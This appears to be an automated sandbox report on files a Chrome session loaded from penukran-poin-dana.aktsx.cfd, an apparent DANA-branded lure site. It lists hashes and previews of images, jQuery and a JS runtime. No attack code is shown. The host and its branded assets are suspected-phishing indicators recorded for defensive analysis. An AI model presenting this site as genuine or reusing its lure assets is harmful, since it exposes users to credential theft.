                                                                                                                            Preview:let e,t,n=!1;const l="undefined"!=typeof window?window:{},s=l.document||{head:{}},o={t:0,l:"",jmp:e=>e(),raf:e=>requestAnimationFrame(e),ael:(e,t,n,l)=>e.addEventListener(t,n,l),rel:(e,t,n,l)=>e.removeEventListener(t,n,l),ce:(e,t)=>new CustomEvent(e,t)},i=e=>Promise.resolve(e),c=(()=>{try{return new CSSStyleSheet,"function"==typeof(new CSSStyleSheet).replaceSync}catch(e){}return!1})(),r="http://www.w3.org/1999/xlink",u=new WeakMap,a=e=>"sc-"+e.o,f={},y=e=>"object"==(e=typeof e)||"function"===e,$=(e,t,...n)=>{let l=null,s=null,o=!1,i=!1;const c=[],r=t=>{for(let n=0;n<t.length;n++)l=t[n],Array.isArray(l)?r(l):null!=l&&"boolean"!=typeof l&&((o="function"!=typeof e&&!y(l))&&(l+=""),o&&i?c[c.length-1].i+=l:c.push(o?h(null,l):l),i=o)};if(r(n),t){t.key&&(s=t.key);{const e=t.className||t.class;e&&(t.class="object"!=typeof e?e:Object.keys(e).filter((t=>e[t])).join(" "))}}const u=h(e,null);return u.u=t,c.length>0&&(u.$=c),u.h=s,u},h=(e,t)=>({t:0,p:e,i:t,m:null,$:null,u:null,h:null}),d={},p=(e,t,
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):31697
                                                                                                                            Entropy (8bit):4.680662198912193
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:SpR13pk5yowF+YaLlEkRaKT3AQ7UQXlBIqh1F0HJbK2e5fAv:DYUTzfVBIkIeZe
                                                                                                                            MD5:BC0CEEA50591F74883DD9B92B19B852C
                                                                                                                            SHA1:5617F0BE48B9A0973C24FF0E1D200201549A4A50
                                                                                                                            SHA-256:A3D7991ADEE411105F2DDD533C34D0F0AFD141187BC13503FD035DE014F954D8
                                                                                                                            SHA-512:BECEDF97CFD689782F6F1057E0629B7E3A26441AD92E647E6A87D1F8C78B18FA44BF6BA39148C6C28836E03C29A7FE4332F41301B439EBC34A5F7AB6CB832322
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:http://penukran-poin-dana.aktsx.cfd/asset/img/hero.svg
                                                                                                                            Preview:<svg width="600" height="527" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><defs><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="d"><stop stop-color="#D2F1FF" offset="0%"/><stop stop-color="#A6DEFF" offset="100%"/></linearGradient><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="e"><stop stop-color="#F9FDFF" offset="0%"/><stop stop-color="#D9EFFF" offset="100%"/></linearGradient><linearGradient x1="32.791%" y1="0%" x2="50%" y2="100%" id="g"><stop stop-color="#BDCCFF" offset="0%"/><stop stop-color="#108EE9" offset="100%"/></linearGradient><linearGradient x1="8.191%" y1="47.527%" x2="102.093%" y2="27.162%" id="i"><stop stop-color="red" offset="0%"/><stop stop-color="#B91E1E" offset="17.311%"/><stop stop-color="red" offset="56.406%"/><stop stop-color="#B02222" offset="69.081%"/><stop stop-color="red" offset="100%"/></linearGradient><linearGradient x1="4.347%" y1="58.377%" x2="94.209%" y2="32.155%" id="j"><stop stop-color="#FFF" offset="0%"/>
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 382 x 112, 8-bit/color RGBA, interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):12786
                                                                                                                            Entropy (8bit):7.97367666555636
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:olyA9pk9pGYsPVMm80Y0xf43FmSqf6x0LUYMTo2OZ9:olyA9pk9kYaV+0t43Tqf6KU/82Of
                                                                                                                            MD5:6FD5A7D18A8F7C04BC5EFFCDC5235987
                                                                                                                            SHA1:C4852C577F44FCDF78FB439A30EA2C6C6983B140
                                                                                                                            SHA-256:C67E5431F9C00BB690EA8B8ADD63D5CA9250BF2925F2C2A691EEEE498AC75853
                                                                                                                            SHA-512:13E05A6F89B8110F1867EFBBC6A7BF216471FF5CAD3739AC3C34E30AAED670844ED8DE5B220EB449B174A272BCABEF07A96F13F936A34AEDD754E6A8ED3CC991
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR...~...p.....n.+.....gAMA......a...1.IDATx..}...5....., ....U.J.A..X.D...'... ..G.......R.."E.#.R...A....R..{....I..m...;3....L&999..2...1..s..1....tFIn.g.c...c..r.f.......Dg..x...ETE.p..O...O......x.)=.......;.....<yr...."...,sv5...e..].bEgF...s..Y..?..6..iX.?.x?.............7n...&....p....G..W.Z5..t.{..EiX<])......0#.%K....?.~wc$Kd.2:OB.R...t\.....':z...,..G.7. ..Kqet..bE._}..,1...g.t.....OO..^.%6..h.U>..-|F......EX.l.. .c<.M.6.:]cbb..n.z....|.....3gN..0...\H..s.#~.........M<.o.3........f.,......E.w.[.*......[....!...%H.+..=z.*>.e.g..._....o[.c.44))..o>.m...G...L.ONN...&.......(:::j.q....=.......Ii...{..aq,.]..>..@..Wa<.......e.)o.x<.8..h........Y<]Y8F...=...{.U..+W......hX..z...{.+.Tt.h/].d:.:q..1#/.3...Y../{.5j.=.4,......2/:..<1.'..3..g....3:./...,.J.m.|.v..._4..v.W0..2..xX..Op...k,...gf..z...=./M.g......"...^..U..<HP....1].n....tO4|.=..<.%c.|f..p..y>d.B.._2.(..{..Y.jC..+AU.ILL.GT(c.Y.....b.2..U}>~...1k..#.3.'.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):4995
                                                                                                                            Entropy (8bit):7.931115594287461
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:SlGAZchlFgcQWvWt3a+iJqYyv1GybaWutijKiac+tUilcX:LAZ8vWtqlA5wybxuvYgcX
                                                                                                                            MD5:A8FF786DD9E1D343F6B9249AEE28C65B
                                                                                                                            SHA1:BDC8D6D4B906734A8DF8850DC1A1CA8A0680FA74
                                                                                                                            SHA-256:F386554DBF390B4AB08123FB5466F5D833C12DE955344CE9EA722E1182CC473F
                                                                                                                            SHA-512:8E4802D1B9F971FACD7F1CF0A07379DC04D95E3963E508B80F176A7B1F040C507E45F75CD29C59778A478D9090398E91A8B0B52EABA91E444D0DE66FF7315DF3
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR..............Qf.....sBIT..U.F.....bKGD....#2..._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-.....IDATx...{......ht..%@......%.Il`}..O..q..8v.g7....ml#. ....F...{......H.k....c1..:u>}....6x..V:h..$A..)...D..6.....hc..|.....9N/=t...4iA.....96...w..v(.'k.n..ee4d.f....i..#C.pp)Q...-_.p..6%lv)....x.#.Xa.[m....F.(T$8.$..2...8i.....~...^98....f.e.....l............S..y.....\.+..p.<b|.l...3.J.o...a..|..3\.7..0..L.J.._1........l\y.S~.?}8...88@.a.y.M...+.}k.%...O.....s.AR..$..)....M..96Xg...l...[l..!A.,).dIc.!M.....{........<.R.\...]..Q^.*..V..$.I.`.U.p.[.a.5rlS..]...&.L...c.0. .d0d...4..M..!.q8'.6%.i.q.K...J%"E......?.........\z.0... .1H..(...\l..O,.c....i{.eY^.#....P.I.l1....6.X+..V....Q3..&8.%.....v..G..t..."kK:........dX2<Y.....{.o..j:..9..'!i..R`....Z)...(.u>.<Y.E.I,.<.o|.?y.z.B.t2.i&...Sd.......!;..+|.y:... ....?.-...E.-]....d.F....#...V[...N......RF.$;..s..\|5.B.I/'.d.,.9.....[
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 382 x 112, 8-bit/color RGBA, interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):12786
                                                                                                                            Entropy (8bit):7.97367666555636
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:olyA9pk9pGYsPVMm80Y0xf43FmSqf6x0LUYMTo2OZ9:olyA9pk9kYaV+0t43Tqf6KU/82Of
                                                                                                                            MD5:6FD5A7D18A8F7C04BC5EFFCDC5235987
                                                                                                                            SHA1:C4852C577F44FCDF78FB439A30EA2C6C6983B140
                                                                                                                            SHA-256:C67E5431F9C00BB690EA8B8ADD63D5CA9250BF2925F2C2A691EEEE498AC75853
                                                                                                                            SHA-512:13E05A6F89B8110F1867EFBBC6A7BF216471FF5CAD3739AC3C34E30AAED670844ED8DE5B220EB449B174A272BCABEF07A96F13F936A34AEDD754E6A8ED3CC991
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR...~...p.....n.+.....gAMA......a...1.IDATx..}...5....., ....U.J.A..X.D...'... ..G.......R.."E.#.R...A....R..{....I..m...;3....L&999..2...1..s..1....tFIn.g.c...c..r.f.......Dg..x...ETE.p..O...O......x.)=.......;.....<yr...."...,sv5...e..].bEgF...s..Y..?..6..iX.?.x?.............7n...&....p....G..W.Z5..t.{..EiX<])......0#.%K....?.~wc$Kd.2:OB.R...t\.....':z...,..G.7. ..Kqet..bE._}..,1...g.t.....OO..^.%6..h.U>..-|F......EX.l.. .c<.M.6.:]cbb..n.z....|.....3gN..0...\H..s.#~.........M<.o.3........f.,......E.w.[.*......[....!...%H.+..=z.*>.e.g..._....o[.c.44))..o>.m...G...L.ONN...&.......(:::j.q....=.......Ii...{..aq,.]..>..@..Wa<.......e.)o.x<.8..h........Y<]Y8F...=...{.U..+W......hX..z...{.+.Tt.h/].d:.:q..1#/.3...Y../{.5j.=.4,......2/:..<1.'..3..g....3:./...,.J.m.|.v..._4..v.W0..2..xX..Op...k,...gf..z...=./M.g......"...^..U..<HP....1].n....tO4|.=..<.%c.|f..p..y>d.B.._2.(..{..Y.jC..+AU.ILL.GT(c.Y.....b.2..U}>~...1k..#.3.'.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:GIF image data, version 89a, 600 x 117
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):325076
                                                                                                                            Entropy (8bit):7.827778077493344
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6144:/fXjcUDi70xUSvxVGM1VHfERuShXmZ40kE2uHU:HXj3DHNHGM1V/EQct3AU
                                                                                                                            MD5:EFB2FB9C6324222F019C04C56B1E00D2
                                                                                                                            SHA1:F0E5C97DE104EF75AD496336D15F4B980E5055E8
                                                                                                                            SHA-256:774D4EED5653477050074D1FBB01B3D554573C55F6EA2D37905B2E2C69D4FB40
                                                                                                                            SHA-512:2144C2C8C8441ED216C75B12DEFEDFD490E1575117E2442788AA840E9475CD40F1C301F719909BEA6D9397891D6C186584D6C1E49349951461A04AA767A961FD
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbD-mmuMUDwaeFMEz6NefivuQqHyrFXvXxqVxMhYRhR5wsfUhiWkPNkpxLKkagRNpJ2obIiZH_D9EK6tnHIJUFMVBOclZI98zrU7VPszAR5n-_GeSWNCNgnfH1MRWuL-ahhPjxsejyDa5yyWAaOMWXWT4jS4EngtdLLlXjaPakQoFIOsjyS6tfnEBHDlw/s16000/output-onlinegiftools.gif
                                                                                                                            Preview:GIF89aX.u.................................................................................................................................................................................................................................................................................................!..%..0..8..?..E..M..T..Z..`..e..l..r..x..}..~.....~..|..y..v..s..o..i..e..b..`..^..[..Z..Y..Y..X..X..Y..\..].._..c..h..l..q..w..~.......................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.....3.!..Generated by onlineGIFtools.com.,....X.u.....g..H......*\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.*]...P.J.J...X.j....`..K...h.]...p..K...x.E....
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 300 x 300, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):7863
                                                                                                                            Entropy (8bit):7.944853026641418
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:Oxyj5jciyprh/k6wSpBFcrApNmH58Byn7w3tdZvdsqVhwN5RxADRPtkch:OxsjQpSIFaAqH58Byn7wZvdZVc5R4vFh
                                                                                                                            MD5:BF1D4A90DE7E29B2BE55237982CB30B4
                                                                                                                            SHA1:EF942049631B598767FDA52D54458B9F9680EE87
                                                                                                                            SHA-256:46518758F002D85CFF9220609163F23B7E9F8F2721561D1E0BA79C4F17425C58
                                                                                                                            SHA-512:3AC1AB4324711A94DDD9F5BC24D5E2CB3948073602AD5E52F0B2C7B61C1DF072ACA6FB9E015DA9E113071A353F7B7E1493EB7F2C9CDBBB6417938FAB17909B09
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:.PNG........IHDR...,...,......tF.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........tIME..........c....IDATx...odGv..son.L..-.o.HU%..T.[Rkma...[......<..4.`..../.4....0.c...n`..I-...V..ZT{...o.%....".d.......(V....'N...4.................,,,2(2X$I.'N..P(.+......A.....i#......L..@.~....X(2.H?..`.9bX.Yg.....I-.. .I=.4..>....m{.Y!.s+'..I.Y&.*C.. cw..M-..C.v.i.....x...rwaB.[M.'.:c,...k..n.jq..%.h..N:..@..........S,...q.......v..C0....v...M..e..b..n..U..!..M+..P..q..-@.M..a..b..~./a...9C;Mx..twG/-@.%f..,K...*.~L..0H.-...Q.a..X`...X;.#.. . ..`.z...R.B..#.1...).:n.K..........E..s<.!s$..Ni.q'..r.>B...S.!...q.aV...Q+.>.V............d.[.c.}.t..|tr..4!.k.# (...&S....$.:.9..A..?U(.l0.mF..0.....8.s..)I.DH0.5....w....r....|.JV\W.v....,?'.H.>j....IF......sXA..I?/0X.._>.$.|.#.F.*,..K<MH.*..:w..)g..3...y.....B.%np.E......g.D;..U....|.wN.%,..W9.W......|...Z...;...o.awA\.A..xYtNt.).29..\..IW..P..MV....V.?.u...1....A.,.iwQ. ,..x....q.....t...
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:GIF image data, version 89a, 599 x 944
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1188349
                                                                                                                            Entropy (8bit):7.9105387110482965
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:6ticeGSw0X1YpmtEg5px3fOtxaOpPP6gKSHZE3thJoFHAXLZqhGG+LZd6e:lwFm+KTmDaOpPP6+E3BnbcR+Ke
                                                                                                                            MD5:785A25D36D14A2C575547966151F81A1
                                                                                                                            SHA1:76B935386863F57B8B829B0D778F0A9257AC4B9D
                                                                                                                            SHA-256:F630B7D3B73881E20CB5CDE9FEFB66E917F66CE96264F0A381ED39A6A399265A
                                                                                                                            SHA-512:1CD2CEE312076114DCBCE17D674CFA90E66B1B81059A6374CB0A265B937D938CC3A01B01AC0823389284A0C90CFFA1D66E3BE54373BE76C9563B79741DB8E1B2
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:GIF89aW.......~..............P..i..e..f..x........................................................m.......................~..........................o..|....!Lm"..#..#..#..#..$l.$..%..%..&w.&..'..'..'..'..(..(..(..(..(..(..)..)..)..)..+..,..,........0..1..6..7..:..;..<..<..=..=..>}.?y.@..@..Aq.A..A..C..C..E..K..R..T..T..T..Uw.U|.Z..`kpc..c..e..e..g..g..g..h..j..l..q..q..s..u..vuwz..{..}..._L.............wu.......................y..........P#............................_L...................zw.......O........................................../..t....O.......xp...........J..}..=....`..t....eP...........................9c.O.((*,/4--.-.1/-//..0/09,%;9:?+$@KSHGHMFEVTU.Pf......LL.5..8L.ZR....b.......................ZJ.v..................................!..NETSCAPE2.0.....!. Cropped with ezgif.com GIF maker.!.......,....W.......7..H......*\. ...2X...B..#j... C...q.A."P.....0c..9....X..h.$..9W....a..).v,...P.J.J..U..+...5..N.>.`.`.:..].R.G.8..Yr .l..%.6.R.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 200 x 200, 8-bit gray+alpha, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):4995
                                                                                                                            Entropy (8bit):7.931115594287461
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:96:SlGAZchlFgcQWvWt3a+iJqYyv1GybaWutijKiac+tUilcX:LAZ8vWtqlA5wybxuvYgcX
                                                                                                                            MD5:A8FF786DD9E1D343F6B9249AEE28C65B
                                                                                                                            SHA1:BDC8D6D4B906734A8DF8850DC1A1CA8A0680FA74
                                                                                                                            SHA-256:F386554DBF390B4AB08123FB5466F5D833C12DE955344CE9EA722E1182CC473F
                                                                                                                            SHA-512:8E4802D1B9F971FACD7F1CF0A07379DC04D95E3963E508B80F176A7B1F040C507E45F75CD29C59778A478D9090398E91A8B0B52EABA91E444D0DE66FF7315DF3
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhl9xJVYWF_a9vAhgW5QQgozvZVADTaJgIX64iO7a5sQuMpSoPBK3zfKjvT6xc9fZPfxZz39mjk1H_oZOOOtYvO1l7DkWNqiD5LJyGYdwDNyHuyqLk_Ix6eFs3aLCG2yUXVwtsnj0BXTA40WZmecyLyCIm_ff0xNkkOvkuKBOl6yfS-QjI_EJrIyGtU/s1600/load_spin.png
                                                                                                                            Preview:.PNG........IHDR..............Qf.....sBIT..U.F.....bKGD....#2..._zTXtRaw profile type APP1.....JO.K-.LV((.O..I.R..c...K.K.D......04006..F@.9T(..........Y..)....O..h.-.....IDATx...{......ht..%@......%.Il`}..O..q..8v.g7....ml#. ....F...{......H.k....c1..:u>}....6x..V:h..$A..)...D..6.....hc..|.....9N/=t...4iA.....96...w..v(.'k.n..ee4d.f....i..#C.pp)Q...-_.p..6%lv)....x.#.Xa.[m....F.(T$8.$..2...8i.....~...^98....f.e.....l............S..y.....\.+..p.<b|.l...3.J.o...a..|..3\.7..0..L.J.._1........l\y.S~.?}8...88@.a.y.M...+.}k.%...O.....s.AR..$..)....M..96Xg...l...[l..!A.,).dIc.!M.....{........<.R.\...]..Q^.*..V..$.I.`.U.p.[.a.5rlS..]...&.L...c.0. .d0d...4..M..!.q8'.6%.i.q.K...J%"E......?.........\z.0... .1H..(...\l..O,.c....i{.eY^.#....P.I.l1....6.X+..V....Q3..&8.%.....v..G..t..."kK:........dX2<Y.....{.o..j:..9..'!i..R`....Z)...(.u>.<Y.E.I,.<.o|.?y.z.B.t2.i&...Sd.......!;..+|.y:... ....?.-...E.-]....d.F....#...V[...N......RF.$;..s..\|5.B.I/'.d.,.9.....[
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 360 x 200, 8-bit/color RGBA, non-interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):16542
                                                                                                                            Entropy (8bit):7.94673343485081
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:384:rD/OMxpVl1O5h+X4cTIceArJp3/JhcrScEYkQq2Peex:rDjxpn1O5h+IcVeAp3fcrxvPdx
                                                                                                                            MD5:6E77DF79B301B9FB95FDF50D66E3CEB7
                                                                                                                            SHA1:1C93476FCCF582D5EA0FA88EC8B1BECC00D9EDB5
                                                                                                                            SHA-256:4262DC8D42209D7E2A597F7F1098880E75AD0F6A53A66DA1A7BD094A5F778199
                                                                                                                            SHA-512:995F53840326CC7C3F42E9DCD2CCDFDD8278FB100158D94B4B36D7799499E5FE03F34D7880713043ED5536EA240866DB338A2EC3FE9B6BF9FCDDFF1330EB1CC1
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:http://penukran-poin-dana.aktsx.cfd/asset/img/bi.png
                                                                                                                            Preview:.PNG........IHDR...h..........{.....sRGB.........sBIT....|.d... .IDATx..y.$U........t.6.6;.......'...8*.(.632"n.:*.......b...~......t....KUVe..............<..R.7N.q..s.9...@ .....@ .....@ .....@ .....@ .....@ .....@ .....@ ...........@V$..].O;....x.....H~.@..kf..+y ..AA......t........v.f..n...7.HR..W..(R....@......G__................G.f....#..I_w.-.Tt..9.VS.n.9w......N...5kf$..@`L..00fH....^.<.8..UR.`6:.S......>..o.-[v.>...7*........U$........*.....1./..3..p-.1Q.....t`T.4.x>p..W...l.... /..........1.+0...oG`B#)....\.x...&.s.E.....137.".&3..E..s$..[.....1&.x.>*.7....l.....L..&0.......b...s=.l.n..1....<.I.d}q..L.....}.[.Y...........7.l.....$....6.:.....Q.$..H......U.X......M.X.{...^..d.cj....l@.....*....*.v..Q@~.......|.X.2.....".M..$.*...~..4O....>.zZx...s7Iz...:........I.B.U.......F.~.V...$....VI..yO..A..t.)......;...Z..3f.*i...l..Yo.. .J>.....02....7p.sn?I_4..#p..$%......7..J|\.HP.6K*..V`#..>......BRw..'.r....'.vI]fv(#....6.....S#x.@
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):31697
                                                                                                                            Entropy (8bit):4.680662198912193
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:768:SpR13pk5yowF+YaLlEkRaKT3AQ7UQXlBIqh1F0HJbK2e5fAv:DYUTzfVBIkIeZe
                                                                                                                            MD5:BC0CEEA50591F74883DD9B92B19B852C
                                                                                                                            SHA1:5617F0BE48B9A0973C24FF0E1D200201549A4A50
                                                                                                                            SHA-256:A3D7991ADEE411105F2DDD533C34D0F0AFD141187BC13503FD035DE014F954D8
                                                                                                                            SHA-512:BECEDF97CFD689782F6F1057E0629B7E3A26441AD92E647E6A87D1F8C78B18FA44BF6BA39148C6C28836E03C29A7FE4332F41301B439EBC34A5F7AB6CB832322
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            Preview:<svg width="600" height="527" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><defs><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="d"><stop stop-color="#D2F1FF" offset="0%"/><stop stop-color="#A6DEFF" offset="100%"/></linearGradient><linearGradient x1="50%" y1="0%" x2="50%" y2="100%" id="e"><stop stop-color="#F9FDFF" offset="0%"/><stop stop-color="#D9EFFF" offset="100%"/></linearGradient><linearGradient x1="32.791%" y1="0%" x2="50%" y2="100%" id="g"><stop stop-color="#BDCCFF" offset="0%"/><stop stop-color="#108EE9" offset="100%"/></linearGradient><linearGradient x1="8.191%" y1="47.527%" x2="102.093%" y2="27.162%" id="i"><stop stop-color="red" offset="0%"/><stop stop-color="#B91E1E" offset="17.311%"/><stop stop-color="red" offset="56.406%"/><stop stop-color="#B02222" offset="69.081%"/><stop stop-color="red" offset="100%"/></linearGradient><linearGradient x1="4.347%" y1="58.377%" x2="94.209%" y2="32.155%" id="j"><stop stop-color="#FFF" offset="0%"/>
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:ASCII text, with very long lines (32038)
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):95992
                                                                                                                            Entropy (8bit):5.391333957965341
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:1536:OP10iSi65U/dXXeyhzeBuG+HYE0WEeLDFoNqLTW8+S5VRZIVI6xSb8xh2ZbQnRmm:R+41ZqLTW8xRrqSb8qGH77da98Hr3
                                                                                                                            MD5:F03E5A3BF534F4A738BC350631FD05BD
                                                                                                                            SHA1:37B1DB88B57438F1072A8EBC7559C909C9D3A682
                                                                                                                            SHA-256:AEC3D419D50F05781A96F223E18289AEB52598B5DB39BE82A7B71DC67D6A7947
                                                                                                                            SHA-512:8EEEAEFB86CF5F9D09426814F7B60E1805E644CAC3F5AB382C4D393DD0B7AB272C1909A31A57E6D38D5ACF207555F097A64A6DD62F60A97093E97BB184126D2A
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js
                                                                                                                            Preview:/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){ret
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:PNG image data, 382 x 112, 8-bit/color RGBA, interlaced
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):12786
                                                                                                                            Entropy (8bit):7.97367666555636
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:192:olyA9pk9pGYsPVMm80Y0xf43FmSqf6x0LUYMTo2OZ9:olyA9pk9kYaV+0t43Tqf6KU/82Of
                                                                                                                            MD5:6FD5A7D18A8F7C04BC5EFFCDC5235987
                                                                                                                            SHA1:C4852C577F44FCDF78FB439A30EA2C6C6983B140
                                                                                                                            SHA-256:C67E5431F9C00BB690EA8B8ADD63D5CA9250BF2925F2C2A691EEEE498AC75853
                                                                                                                            SHA-512:13E05A6F89B8110F1867EFBBC6A7BF216471FF5CAD3739AC3C34E30AAED670844ED8DE5B220EB449B174A272BCABEF07A96F13F936A34AEDD754E6A8ED3CC991
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:http://penukran-poin-dana.aktsx.cfd/asset/img/dana_logo.png
                                                                                                                            Preview:.PNG........IHDR...~...p.....n.+.....gAMA......a...1.IDATx..}...5....., ....U.J.A..X.D...'... ..G.......R.."E.#.R...A....R..{....I..m...;3....L&999..2...1..s..1....tFIn.g.c...c..r.f.......Dg..x...ETE.p..O...O......x.)=.......;.....<yr...."...,sv5...e..].bEgF...s..Y..?..6..iX.?.x?.............7n...&....p....G..W.Z5..t.{..EiX<])......0#.%K....?.~wc$Kd.2:OB.R...t\.....':z...,..G.7. ..Kqet..bE._}..,1...g.t.....OO..^.%6..h.U>..-|F......EX.l.. .c<.M.6.:]cbb..n.z....|.....3gN..0...\H..s.#~.........M<.o.3........f.,......E.w.[.*......[....!...%H.+..=z.*>.e.g..._....o[.c.44))..o>.m...G...L.ONN...&.......(:::j.q....=.......Ii...{..aq,.]..>..@..Wa<.......e.)o.x<.8..h........Y<]Y8F...=...{.U..+W......hX..z...{.+.Tt.h/].d:.:q..1#/.3...Y../{.5j.=.4,......2/:..<1.'..3..g....3:./...,.J.m.|.v..._4..v.W0..2..xX..Op...k,...gf..z...=./M.g......"...^..U..<HP....1].n....tO4|.=..<.%c.|f..p..y>d.B.._2.(..{..Y.jC..+AU.ILL.GT(c.Y.....b.2..U}>~...1k..#.3.'.
                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            File Type:GIF image data, version 89a, 599 x 944
                                                                                                                            Category:downloaded
                                                                                                                            Size (bytes):1386608
                                                                                                                            Entropy (8bit):7.948969560961841
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24576:l4aakeklO/ZuwKLBZc9cze/MI79RPXCZWboEuPMdctT8OpYKQK:l/A/ZuwWMcze/MI7r/CUboElOtDp9
                                                                                                                            MD5:3C0CBF27635610CC0872EB182C737B41
                                                                                                                            SHA1:E9496FD5B16ED12289D07BB4E4EFCDD0F4AC6450
                                                                                                                            SHA-256:90B285F5AD416E5FFA9A0F86C73653641C4B69E12A108011B362E8D1158D7594
                                                                                                                            SHA-512:C9684C8B5295904E0FCD8874DD2F884443AD062F2E78A40FF4532BEBC3C6FB2AFB3D1F80957B381A9C037B41C7F278D19DFD3CE261A5EC4370B3B2120D1DCC3C
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
                                                                                                                            URL:https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilUMIG_IMFVixTFpWb4xA5f1HJt25lbv-cc1baknB_YJeWO9FYU4SJOzdeMNkA1msFpUU-0MiI3B-llmFX122-XhqCq7-1HW4YUfaWX52rlNtfspDDvlFNj_A--xZIRknP3ycDkzm51noxYaFx_gfOck3U745QZSBwpCSesqOq1oEycuQamqaZlqoz/s16000/ezgif.com-crop%20(3).gif
